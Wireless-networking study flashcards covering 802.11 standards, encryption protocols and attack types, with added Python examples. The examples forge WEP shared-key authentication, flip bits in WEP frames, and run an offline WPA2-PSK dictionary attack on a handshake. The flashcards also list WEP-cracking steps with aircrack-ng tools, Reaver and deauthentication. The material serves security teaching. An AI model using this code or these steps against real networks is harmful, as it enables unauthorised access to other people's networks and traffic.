Chapter 15: Wireless Networking Flashcards
Cons to WiFi
1) DECREASE IN BANDWIDTH B/C MORE DEVICES CONNECTED
2) INVEST IN NW CARDS, INFRASTRUCTURE
3) INTERFERENCE W/ OTHER DEVICES
4) LESS RANGE THAN ADVERTISED (usually half the distance promised)
5) TERRAIN CAN SLOW DOWN SIGNALS
Characteristics of WiFi
1) uses RADIO WAVES to transmit data
2) defines the physical layer and the MAC sublayer of the data link layer (802.11 is not purely physical-layer)
Techniques for managing a connection (physical-layer transmission methods)
1) DSSS (direct-sequence spread spectrum)
2) FHSS (frequency-hopping spread spectrum)
3) IR (infrared)
4) OFDM (orthogonal frequency-division multiplexing)
WiFi Environment: Extension to an existing wired NW as either HW (HAPs) or SW (SAPs) based access points
HAPs //use device such as wireless router or dedicated wireless access point
SAPs //wireless-enabled system attached to a wired NW, which in essence shares its wireless adapter
WiFi Environment: Multiple access points
allows clients to roam from location to location
WiFi Environment: LAN-to-LAN wireless NW
wired NWs in different locations to be connected through wireless technology
WiFi Environment: 3G or 4G hot spot
provides WiFi access to WiFi enabled devices
Wireless standards
1) 802.11a 5 GHz (freq), 54 Mbps (speed), ~75 ft (indoor range)
2) 802.11b 2.4 GHz, 11 Mbps, ~150 ft
3) 802.11g 2.4 GHz, 54 Mbps, ~150 ft (backward compatible with 802.11b; the 11 Mbps figure belongs to b, not g)
4) 802.11n 2.4/5 GHz, up to 600 Mbps (150 Mbps per spatial stream, MIMO, up to 4 streams), ~230 ft indoor
5) 802.16 (WiMAX) 10-66 GHz in the original spec (802.16a added 2-11 GHz), ~70 Mbps (up to ~1 Gbps in later amendments), ~30 miles
6) Bluetooth 2.4 GHz, 1 Mbps (v1.x) to 3 Mbps (v2.x EDR), ~33 ft (class 2 devices)
About SSID
Service Set Identifier: the human-readable NW name
0 to 32 bytes (the IE length field is one byte, max value 32)
Carried as an information element in 802.11 management frames (beacons, probe requests/responses, association requests), NOT in the header of every data packet
Open NWs broadcast it in beacons, so it is visible to any scanner
"Closed"/"cloaked" NWs beacon with an empty SSID field; the name is still sent in the clear in probe responses and association requests, so a sniffer recovers it as soon as any client connects. Cloaking is an obscurity measure, not a security control.
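The following is an added example (not part of the original flashcards) showing where the SSID actually lives in 802.11 management frames and why "cloaking" does not hide it. It builds three constructed frames (a cloaked beacon, a directed probe response, and a client association request) with assumed MAC addresses and the assumed SSID "corp-wifi", then parses the tagged information elements the way a passive sniffer would; the frame layout follows the standard management-frame header and IE encoding.

```python
import struct

# 802.11 management subtypes of interest; addr3 carries the BSSID in all three
SUBTYPE = {0: "association-request", 5: "probe-response", 8: "beacon"}
FIXED_LEN = {0: 4, 5: 12, 8: 12}   # fixed fields that precede the tagged IEs
IE_SSID = 0
IE_RATES = 1


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def build_mgmt(subtype, src, dst, bssid, ssid):
    """Constructed sample frame (not a capture): minimal MAC header + fixed fields + SSID/rates IEs."""
    if len(ssid) > 32:
        raise ValueError("SSID is at most 32 bytes")
    fc = struct.pack("<H", subtype << 4)            # type 0 (management), no flags
    hdr = fc + b"\x00\x00" + dst + src + bssid + b"\x00\x00"   # duration, addr1-3, seq ctrl
    if subtype in (5, 8):
        fixed = b"\x00" * 8 + struct.pack("<HH", 100, 0x0411)  # timestamp, interval, capabilities
    else:
        fixed = struct.pack("<HH", 0x0411, 10)               # capabilities, listen interval
    ies = bytes([IE_SSID, len(ssid)]) + ssid
    ies += bytes([IE_RATES, 4, 0x82, 0x84, 0x8B, 0x96])      # 1, 2, 5.5, 11 Mbps (basic)
    return hdr + fixed + ies


def parse_ies(tagged):
    """Walk tag/length/value triples; later duplicates overwrite earlier ones."""
    ies, off = {}, 0
    while off + 2 <= len(tagged):
        tag, ln = tagged[off], tagged[off + 1]
        ies[tag] = tagged[off + 2: off + 2 + ln]
        off += 2 + ln
    return ies


def parse_mgmt(frame):
    fc = struct.unpack_from("<H", frame, 0)[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0 or subtype not in SUBTYPE:
        raise ValueError("not a beacon / probe response / association request")
    ies = parse_ies(frame[24 + FIXED_LEN[subtype]:])
    raw = ies.get(IE_SSID, b"")
    # "Cloaked" APs beacon with a zero-length SSID IE or one padded with NULs
    hidden = raw.strip(b"\x00") == b""
    return {"subtype": SUBTYPE[subtype], "bssid": mac(frame[16:22]),
            "ssid": None if hidden else raw.decode("utf-8", "replace"), "hidden": hidden}


def recover_ssids(frames):
    """Per BSSID: did the beacon cloak the name, and what name leaked in other management frames."""
    table = {}
    for f in frames:
        info = parse_mgmt(f)
        entry = table.setdefault(info["bssid"], {"cloaked": False, "ssid": None})
        if info["subtype"] == "beacon" and info["hidden"]:
            entry["cloaked"] = True
        elif info["ssid"] is not None:
            entry["ssid"] = info["ssid"]
    return table


# Constructed sample traffic with assumed addresses (not from a real capture)
AP = bytes.fromhex("001122334455")
STA = bytes.fromhex("aabbccddeeff")
BROADCAST = b"\xff" * 6
SAMPLE_FRAMES = [
    build_mgmt(8, AP, BROADCAST, AP, b""),        # cloaked beacon: empty SSID
    build_mgmt(5, AP, STA, AP, b"corp-wifi"),      # directed probe response: SSID in clear
    build_mgmt(0, STA, AP, AP, b"corp-wifi"),      # client association request: SSID in clear
]

if __name__ == "__main__":
    for bssid, entry in recover_ssids(SAMPLE_FRAMES).items():
        print(bssid, entry)
```

The beacon alone tells the scanner only that a BSSID exists; the first probe response or association request gives the name away, which is exactly what wardriving tools do when they list a "hidden" network by name after a client joins.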
Common Wireless Terms:
GSM Association BSSID Hot Spot Access Point ISM Bandwidth
GSM // Global System for Mobile Communications // international standard for mobile wireless
Association //connecting a client to an access point
BSSID // basic service set identifier //MAC address of the access point radio (one per SSID per radio; the BSSID, not the SSID, uniquely names a cell)
Hot Spot //location that provides wireless access to public such as coffee shop or airport
Access Point //HW or SW construct that provides wireless access
ISM band// industrial, scientific, and medical band //unlicensed band of frequencies (2.4 GHz and 5 GHz WiFi, Bluetooth, microwave ovens all share it, hence the interference)
Bandwidth //data rate available to devices (shared by all clients on the same AP)
Antennas
Yagi antenna
Omnidirectional antenna
Parabolic grid antenna
Yagi antenna //directional, transmits and receives well in one direction //typically used for site-to-site links instead of covering a wide area //limits the area the signal reaches, which reduces (but does not prevent) eavesdropping from outside the beam
Omnidirectional antenna //emits signals in all directions, but some directions better than others //covers the horizontal plane (2-D) well, weak directly above and below (3-D)
Parabolic grid antenna //takes the form of a dish, highly directional, sends and receives along one axis //PRO - catches parallel signals and focuses them to a single receiving point, so better signal quality over longer ranges //can receive over a distance of 10 miles, which is also why an attacker with one can reach a NW from far outside the building
WiFi Authentication Mode: Open System Authentication
//makes the NW available to a wide range of clients; no credential is checked
//client sends an authentication request frame to the access point, the access point replies with an authentication response ("success"), then the client sends an association request carrying the SSID and the AP confirms; the SSID match happens at association, not authentication, and any client that knows the SSID gets in (encryption, if any, is negotiated afterwards by WPA/WPA2)
WiFi Authentication Mode: Shared Key Authentication
//each client receives the WEP key ahead of time and can connect at any time
//client sends an authentication request to the access point, the AP returns a 128-byte challenge in the clear, the client encrypts the challenge with WEP (RC4 under the shared key), the AP decrypts it with the same key and, if the result matches the challenge, the client is validated and connected
//caveat: an eavesdropper sees the cleartext challenge AND its ciphertext, so XORing them yields the RC4 keystream for that IV; the attacker can then answer the AP's next challenge without knowing the key. Shared-key authentication is therefore weaker than open system authentication, not stronger.
Wireless encryption and authentication protocols:
WEP WPA WPA2 WPA2 Enterprise TKIP AES EAP LEAP RADIUS 802.11i CCMP
WEP//Wired Equivalent Privacy//oldest and weakest; RC4 with a 40- or 104-bit static key and a 24-bit IV
WPA//WiFi Protected Access//interim successor to WEP (2003), addressed many of its problems on the same hardware //mandates TKIP [Temporal Key Integrity Protocol] with the Michael MIC [Message Integrity Code]; AES-CCMP was optional in WPA, not the default
WPA2//addresses WPA problems; implements the full 802.11i standard //AES-CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol) is mandatory, TKIP is kept only for backward compatibility; EAP [extensible authentication protocol] is used in the Enterprise mode; key size is AES-128 in both WPA and WPA2, the gain is CCMP replacing RC4/TKIP, not longer keys
WPA2 Enterprise//incorporates 802.1X/EAP with an authentication server to strengthen security and scale to large enterprise environments (per-user credentials, per-session keys)
TKIP//wraps RC4 with per-packet key mixing, a 48-bit sequence counter (replay protection) and the Michael MIC so WEP-era hardware could be patched in firmware; deprecated since 2012, still RC4 underneath
AES//symmetric-key block cipher//used by CCMP in WPA2 to replace RC4/TKIP
EAP //framework that carries many authentication methods //such as token cards, Kerberos, certificates (EAP-TLS), passwords (PEAP/MS-CHAPv2)
LEAP //Lightweight Extensible Authentication Protocol //made by Cisco; based on MS-CHAP, vulnerable to offline dictionary attacks on the captured challenge/response (the asleap tool), so it should not be used
RADIUS //Remote Authentication Dial-in User Service //centralized authentication and authorization mgmt system; the usual back end for WPA2 Enterprise
802.11i //IEEE standard that specifies security mechanisms for 802.11 wireless NWs (WPA2 is the WiFi Alliance certification for it)
CCMP //AES in CCM mode with 128-bit keys and a 48-bit packet number that serves as the IV and is used for replay detection; unlike WEP's 24-bit IV the counter never wraps in practice
WEP
design goals (all of which it failed): //provide security on the same level as a wired NW //defeat eavesdropping on communications //check the integrity of data as it flows across the NW //use a shared key to encrypt packets prior to transmission //provide confidentiality and access control
problems: //protocol was designed without input from the academic community or public and professional cryptologists //the key is recoverable from captured ciphertext alone once enough packets are collected (FMS/KoreK/PTW statistical attacks on RC4's key schedule), and trivially with known plaintext //CRC32 //Cyclic Redundancy Check //used as the integrity check, but CRC32 is linear, so an attacker can flip bits in the ciphertext and fix up the checksum without the key //IVs //initialization vectors are only 24 bits (about 16.7 million values), so the entire pool of IVs is exhausted in a short time on a busy NW and keystreams repeat //shared-key authentication leaks keystream //vulnerable to DoS attack through management messages that WEP does not authenticate
// how WEP uses the IV: a per-packet value, sent in the clear in the frame, that is concatenated with the secret key to form the RC4 seed (IV || key), so that the same key yields a different keystream per packet; once an IV repeats, two packets share a keystream and XORing them cancels it out
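To make the WEP weaknesses above concrete (the shared-key authentication leak described under "Shared Key Authentication" and the CRC32 bit-flipping problem in the list just above), here is an added example that is not part of the original flashcards. It implements WEP's RC4 encryption and CRC32 ICV as specified, plays both sides of a shared-key authentication exchange, then shows an eavesdropper forging a valid response and modifying an encrypted frame without ever learning the key. The key, IVs and message contents are assumed sample values.

```python
import os
import struct
import zlib


def rc4(key, data):
    """Plain RC4 (the WEP stream cipher); for WEP the key is IV || shared key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data):
    """WEP integrity check value: plain CRC32, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key, iv, data):
    """WEP frame body: IV(3) || key index(1) || RC4(IV || key, data || ICV)."""
    return iv + b"\x00" + rc4(iv + key, data + icv(data))


def wep_decrypt(key, body):
    iv, ct = body[:3], body[4:]
    pt = rc4(iv + key, ct)
    data, tag = pt[:-4], pt[-4:]
    if tag != icv(data):
        raise ValueError("ICV mismatch")
    return data


class AccessPoint:
    """Shared-key authentication: send a clear challenge, expect it back WEP-encrypted."""
    def __init__(self, key):
        self.key = key

    def challenge(self):
        return os.urandom(128)      # challenge text is 128 bytes in the spec

    def verify(self, challenge, response):
        try:
            return wep_decrypt(self.key, response) == challenge
        except ValueError:
            return False


def client_respond(key, iv, challenge):
    return wep_encrypt(key, iv, challenge)


def eavesdrop_keystream(challenge, response):
    """Attacker sees the clear challenge and its ciphertext: XOR gives 132 keystream bytes for that IV."""
    iv, ct = response[:3], response[4:]
    return iv, xor(challenge + icv(challenge), ct)


def forge_response(iv, keystream, new_challenge):
    """Answer a fresh challenge with the stolen keystream, reusing the same IV; no key needed."""
    return iv + b"\x00" + xor(new_challenge + icv(new_challenge), keystream)


def bitflip(body, delta):
    """Change the plaintext of an encrypted frame without the key.
    CRC32 is linear: crc(x ^ d) == crc(x) ^ crc(d) ^ crc(zeros), so the ICV can be fixed up blind.
    delta must be as long as the frame's data field."""
    tag_delta = xor(struct.pack("<I", zlib.crc32(delta) & 0xFFFFFFFF), icv(b"\x00" * len(delta)))
    return body[:4] + xor(body[4:], delta + tag_delta)


def demo_shared_key_bypass(key=bytes.fromhex("0a1b2c3d4e")):
    """True when the AP accepts a response forged from a single observed legitimate exchange."""
    ap = AccessPoint(key)
    c1, iv = ap.challenge(), b"\x12\x34\x56"
    r1 = client_respond(key, iv, c1)            # legitimate client authenticates
    assert ap.verify(c1, r1)
    iv2, ks = eavesdrop_keystream(c1, r1)       # attacker only sniffs this exchange
    c2 = ap.challenge()                         # attacker now asks to authenticate
    return ap.verify(c2, forge_response(iv2, ks, c2))


if __name__ == "__main__":
    print("forged auth accepted:", demo_shared_key_bypass())
```

The same keystream-recovery trick is what makes a repeated IV fatal: with only 2^24 IVs, a busy AP repeats one within hours, and any two frames sharing an IV can be XORed together to cancel the keystream.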
Cracking WEP
intercept as many IVs as possible by sniffing, analyze the packets statistically, recover the key (PTW needs on the order of tens of thousands of IVs; older FMS-style attacks need hundreds of thousands)
may take a while on a quiet NW; to speed up, perform packet injection to generate traffic
1) Put the wireless interface on the attacking system into monitor mode on the target access point's channel (airmon-ng); this mode captures all frames in the air, not just those addressed to the card
2) Probe the target NW with the wireless device to determine whether packet injection works (aireplay-ng test mode)
3) Use a tool such as aireplay-ng to perform fake authentication with the access point so the AP accepts injected frames from the attacker's MAC
4) Start a WiFi sniffing tool such as airodump-ng to capture IVs; meanwhile aireplay-ng intercepts ARP requests and reinjects them into the NW, causing the AP to generate many more encrypted packets (and fresh IVs)
5) Run a tool such as Cain & Abel or aircrack-ng on the capture to extract the encryption key from the collected IVs
AirPcap
AirPcap //USB adapter that captures raw 802.11 frames (including management and control frames and radio metadata) on Windows in ways a standard WiFi card driver cannot //good for auditing wireless NWs with Wireshark and similar tools
WPA & cracking WPA
most important development introduced in WPA is TKIP: a per-packet key mixing function so that the RC4 key changes for every frame, plus the Michael MIC and a sequence counter against replay
flaws: //weak passphrases chosen by users (the PSK is derived from the passphrase and SSID, so a dictionary attack on a captured handshake recovers it) //packet spoofing and MIC-recovery attacks against TKIP (Beck-Tews and later), which is why TKIP is deprecated //authentication issues with MS-CHAP v2 [Microsoft Challenge Handshake Authentication Protocol version 2] in PEAP/LEAP-style Enterprise deployments when clients do not validate the server certificate
Cracking WPA
REAVER //free in Kali, one of the best-known tools; it does not attack WPA itself but brute-forces the WPS (WiFi Protected Setup) PIN of the AP, which is only 8 digits split into two independently checked halves, and the AP then hands over the WPA/WPA2 passphrase
WPA2 and its two modes
full compatibility with 802.11i standards for security
Can function in two modes:
1) WPA2-Personal //relies on input of key into each station
2) WPA2-Enterprise //uses an authentication server to perform key mgmt and authentication for wireless clients over 802.1X/EAP; the server is commonly RADIUS
Types of attacks on WPA and WPA2
Offline Attack
Deauthentication attack
Brute-force WPA keys
OFFLINE ATTACK //attacker in proximity to the access point observes the 4-way handshake between a client and the AP; the captured handshake (nonces, MACs, and the MIC on message 2) is enough to test passphrase guesses offline, with no further interaction with the NW
DEAUTHENTICATION ATTACK //sending spoofed deauthentication frames to force a client to reconnect, so the attacker can capture a fresh handshake (or simply deny service); possible because 802.11 management frames are unauthenticated unless 802.11w is enabled
BRUTE-FORCE WPA KEYS //trying passphrase candidates (dictionary or brute force) against the captured handshake over and over again; tools such as aircrack-ng, aireplay-ng, KisMAC; the PBKDF2 derivation (4096 iterations) makes each guess deliberately slow, so long random passphrases are out of reach while dictionary words are not
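The offline attack above, worked through as an added example (not part of the original flashcards): WPA2-Personal derives the PMK from the passphrase and SSID with PBKDF2-HMAC-SHA1, expands it to the PTK with both MAC addresses and both nonces, and authenticates handshake message 2 with a MIC under the first 16 bytes of the PTK (the KCK). Everything the MIC depends on except the passphrase is visible on the air, so an attacker recomputes the MIC per candidate. The handshake below is constructed inside the block from an assumed passphrase, SSID, MACs and nonces so the example runs offline; a real attack would take those fields from a capture instead.

```python
import hashlib
import hmac
import struct

# Offset of the MIC inside an EAPOL-Key frame:
# EAPOL hdr(4) + descriptor type(1) + key info(2) + key len(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFF = 81
# Constructed RSN IE (WPA2, CCMP pairwise, PSK AKM) as a client sends it in message 2
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def pmk_from_passphrase(passphrase, ssid):
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key, label, data):
    """802.11i PRF: concatenated HMAC-SHA1 blocks, counter appended, truncated to 64 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK from PMK, both MACs and both nonces (sorted so both sides derive the same key)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol):
    """Key descriptor version 2 (AES-CCMP): HMAC-SHA1 truncated to 128 bits over the frame with the MIC zeroed."""
    return hmac.new(kck, eapol, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce):
    """EAPOL-Key message 2 with the MIC field zeroed; key info 0x010a = version 2, pairwise, MIC present."""
    body = (b"\x02" + struct.pack(">H", 0x010A) + struct.pack(">H", 16) + struct.pack(">Q", 1)
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16
            + struct.pack(">H", len(RSN_IE)) + RSN_IE)
    return b"\x02\x03" + struct.pack(">H", len(body)) + body


def constructed_handshake(passphrase, ssid, ap_mac, sta_mac, anonce, snonce):
    """Constructed stand-in for a capture: message 1 gives ANonce, message 2 gives SNonce and the MIC."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    msg2 = bytearray(build_eapol_msg2(snonce))
    msg2[MIC_OFF:MIC_OFF + 16] = eapol_mic(ptk[:16], bytes(msg2))
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "msg2": bytes(msg2)}


def crack_psk(hs, wordlist):
    """Offline dictionary attack: recompute the message-2 MIC per candidate; return the passphrase that matches."""
    frame = bytearray(hs["msg2"])
    captured = bytes(frame[MIC_OFF:MIC_OFF + 16])
    frame[MIC_OFF:MIC_OFF + 16] = b"\x00" * 16
    zeroed = bytes(frame)
    for cand in wordlist:
        pmk = pmk_from_passphrase(cand, hs["ssid"])          # the slow step: 4096 PBKDF2 rounds
        kck = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured):
            return cand
    return None


# Constructed sample input (assumed passphrase, SSID, MACs, nonces); the secret is used only to build it
HANDSHAKE = constructed_handshake(
    "correct horse battery", "corp-wifi",
    bytes.fromhex("001122334455"), bytes.fromhex("aabbccddeeff"),
    bytes(range(32)), bytes(range(32, 64)))
WORDLIST = ["password", "12345678", "corp-wifi", "letmein123", "correct horse battery", "Summer2019!"]

if __name__ == "__main__":
    print("recovered PSK:", crack_psk(HANDSHAKE, WORDLIST))
```

Note that the SSID is the PBKDF2 salt, so precomputed tables only help against common SSIDs; a unique SSID plus a long random passphrase pushes the per-guess cost past what the attacker can afford, which is the reasoning behind the "complex password" mitigation below.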
Risk Mitigation of WEP and WPA cracking
1) COMPLEX, LONG PASSPHRASE (and a non-default SSID, since the SSID salts the key derivation)
2) VALIDATE THE AUTHENTICATION SERVER'S CERTIFICATE ON THE CLIENT SIDE (Enterprise mode), so a rogue AP with its own RADIUS server cannot harvest credentials
3) ELIMINATE WEP AND WPA, MOVE TO WPA2 (or WPA3 where supported); disable WPS
4) USE AES-CCMP ENCRYPTION; do not allow TKIP, which is deprecated
An attack against wireless NW can be passive or active
Passive //sniffing information that is transmitted; undetectable because nothing is sent
Active //transmitting frames (probe requests, deauthentication, injected packets) to elicit a response or alter NW state
Types of attacks
WARDRIVING ROGUE ACCESS POINTS REVERSE SSH TUNNELING with Raspberry Pi MAC SPOOFING AD HOC MISCONFIGURATION CLIENT MISASSOCIATION PROMISCUOUS CLIENT JAMMING ATTACKS HONEYSPOT ATTACK
WARDRIVING //driving around area with computing device to detect wireless clients and APs
Site Survey Tools KisMAC,NetStumbler, Kismet, WaveStumbler, InSSIDer
//common for these types of tools to connect to GPS to pinpoint location
Warflying // Warballooning //Warwalking //warchalking
ROGUE ACCESS POINTS //attacker installs new AP completely unsecure behind company firewall
REVERSE SSH TUNNELING //device such as raspberry pi opens connection from inside NW out to attacker to bypass FW restrictions
MAC SPOOFING //for APs that use MAC filtering, you can use MAC spoofing; MAC filtering blacklists or whitelists the MAC addresses of clients, but MAC addresses are sent in the clear in every frame, so an attacker sniffs the address of an approved client and changes their own card to it (or to any address that is not blocked)
Tools SMAC, ifconfig, changemac.sh
AD HOC //use of WiFi adapter to connect direct to another wireless-enabled system; two systems can interact with each other; main threat is users do not know the difference between infrastructure and ad hoc NW and so may attach to an unsecure NW
MISCONFIGURATION
CLIENT MISASSOCIATION //WiFi propagates through walls and structures; a client attaches to an AP that is on a NW other than theirs, either accidentally or deliberately, bypassing the organization's controls
PROMISCUOUS CLIENT //a client that intentionally offers an irresistibly strong signal (or answers any probe) for malicious purposes, to lure other stations into connecting to it
JAMMING ATTACKS //works on any type of wireless NW, essentially DoS attack; can use a specifically designed HW device that can transmit signals that interfere with 802.11 NWs
HONEYSPOT ATTACK //attacker sets up rogue access point in range of several legit ones
HW device WiFi Pineapple from Hak5
Modes of Bluetooth
DISCOVERABLE //allows device to be scanned and located by other bluetooth
LIMITED DISCOVERABLE //discovered for short period of time
NONDISCOVERABLE //does not answer inquiry scans, so it cannot be located by scanning; however a device that has previously paired with (or otherwise learned the address of) the system can still connect to it directly
PAIR or NONPAIR //can or cannot pair with another device
some attacks include:
leaking calendar, address book, activate cameras, microphones, control a phone to make calls, connect to internet